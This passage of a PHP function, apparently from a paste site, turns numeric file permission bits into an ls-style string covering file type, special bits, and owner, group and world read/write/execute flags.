- } elseif (($perms & 0x8000) == 0x8000) {
- // Regular
- $info = '-';
- } elseif (($perms & 0x6000) == 0x6000) {
- // Block special
- $info = 'b';
- } elseif (($perms & 0x4000) == 0x4000) {
- // Directory
- $info = 'd';
- } elseif (($perms & 0x2000) == 0x2000) {
- // Character special
- $info = 'c';
- } elseif (($perms & 0x1000) == 0x1000) {
- // FIFO pipe
- $info = 'p';
- } else {
- // Unknown
- $info = 'u';
- }
- // Owner
- $info .= (($perms & 0x0100) ? 'r' : '-');
- $info .= (($perms & 0x0080) ? 'w' : '-');
- $info .= (($perms & 0x0040) ?
- (($perms & 0x0800) ? 's' : 'x' ) :
- (($perms & 0x0800) ? 'S' : '-'));
- // Group
- $info .= (($perms & 0x0020) ? 'r' : '-');
- $info .= (($perms & 0x0010) ? 'w' : '-');
- $info .= (($perms & 0x0008) ?
- (($perms & 0x0400) ? 's' : 'x' ) :
- (($perms & 0x0400) ? 'S' : '-'));
- // World
- $info .= (($perms & 0x0004) ? 'r' : '-');
- $info .= (($perms & 0x0002) ? 'w' : '-');
- $info .= (($perms & 0x0001) ?
- (($perms & 0x0200) ? 't' : 'x' ) :
- (($perms & 0x0200) ? 'T' : '-'));
- return $info;
- }
- ?>
Add Comment
Please, Sign In to add comment